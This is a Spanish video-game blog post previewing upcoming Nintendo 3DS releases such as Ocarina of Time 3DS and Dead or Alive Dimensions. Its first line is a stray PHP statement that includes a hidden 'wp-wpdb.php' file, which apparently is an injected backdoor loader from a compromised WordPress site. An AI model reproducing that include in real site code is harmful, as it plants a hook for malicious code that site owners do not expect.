if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Carga tu Nintendo 3DS que se avecinan juegazos! – La Fortaleza de LeChuck

Carga tu Nintendo 3DS que se avecinan juegazos!

Parecía una chorrada, pero que bien va llegar a casa y dejar la consola en su base de carga!

Desde la salida de la nueva consola portátil de Nintendo, el catálogo se ha quedado bastante solitario, dejándonos con los juegos de primera hornada y poco más que llevarse a la boca. Esto, junto a la tardía actualización ( que debería llegar este mismo mes) que nos activa el navegador web y la EShop, Nintendo 3DSWare, para comprar aplicaciones y juegos descargables, hace que estemos ansiosos por conocer que nos depara el futuro con nuestra portátil táctil.

No vayáis a pensar que os habéis precipitado comprando la consola! Ya habéis disfrutado de buenos juegos de primera hornada, y ahora, probablemente ha sido nintendo la culpable de este vacío, al adelantarse un poco en la salida de la consola, y no haber tenido bien atado el catálogo durante estas semanas después de su salida.

Vamos a hacer un repaso a los mejores juegos que se avecinan proximamente y juegos interesantes anunciados con algo de chicha que masticar:

The Legend of Zelda: Ocarina of Time 3DS (Nintendo) Salida: 17/06 Recomendado 5/5

Las orejas de Link en esta versión están dando que hablar!

Muchos somos los fans de Zelda que han comprado la consola Nintendo 3DS al ser anunciado Zelda 3DS ( ya lo insinua nuestra encuesta, aunque ya sacaremos conclusiones cuando termine), que es ni más ni menos que el Zelda Ocarina of Time original de Nintendo 64, con algunos arreglos y efecto 3D para que nos sintamos en plena campiña de Hyrule. ( estaréis conmigo que remake, lo que se dice remake, no es). No necesita presentación, si no has jugado a esta aventura, has de jugarla, si ya lo has jugado puede perder algún punto, al carecer para algunas personas de muchos nuevos extras como aliciente ( Aunque algo, si ha dicho Nintendo, sí caerá)

Steel Diver (Nintendo) Salida: 06/05 Recomendado 3/5

Parece bastante entretenido, pero se hará repetitivo?

Este juego de submarinos, fue uno de los juegos que enseñaban junto a Nintendo 3DS en las ferias, parece que lo han tenido unos meses más en preparación para dar un producto más acabado. Según ciertas impresiones, el juego carece de profundidad y se hace corto. Un detalle interesante es saber que es el primero juego en utilizar el giroscopio de nuestra consola. Seguro que encuentra su pequeño círculo de fans, pero es un juego que no gustará a todo el mundo.

Dead or Alive: Dimensions (Tecmo Koei) Salida 20/05 Recomendado 4/5

La censura absurda siempre está a la orden del día en los videojuegos, ves la diferencia?

Los amantes de la lucha están de enhorabuena con 3DS, parece que va a ser una consola perfecta para el género. Continuando con la llegada de las sagas más emblemáticas en Nintendo 3DS, llega Dead or Alive para enseñarnos como se verá su forma de luchar en 3D, y las luchadoras, que no desperdiciarán la oportunidad de enseñar un poco de «pechamen», para no variar. Viendo la gran oportunidad con esta pantalla de nintendo, está claro que en los próximos meses veremos hacer aparición un Xtreme Volleyball dándolo todo, pero esto ya es una suposición mía.

Resident Evil: The Mercenaries 3D (Capcom) Salida 20/05 Recomendado 3/5

El primer juego mature-gore de 3DS 

Haciendo gala de un apartado técnico de espanto, y como entradilla al RE de los «gordos» que preparan para 3DS, también nos llega a finales de este mes RE: The Mercenaries. Si no habéis probado este modo en RE4, deciros que es una extensión bastante arcade que se apoya en la acción más directa que nos ha dado la saga en sus últimos títulos. La saga pide a gritos un reset, pero como juego portátil no podemos hacerle ascos a este regalo!

Esto es lo que tendremos en el catálogo en cuanto al futuro próximo (estoy hablando de este mes y el que viene!). De momento disfrutemos de todos estos, y aunque sea apostar por lo facil, esperemos que también salga alguna joya entre juegos no nombrados en esta entrada. Proximamente hablaremos de juegos anunciados para el futuro que harán que babeemos en 3D.

Publicada el
Categorizado como Opinión

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

5 comentarios

Dejar un comentario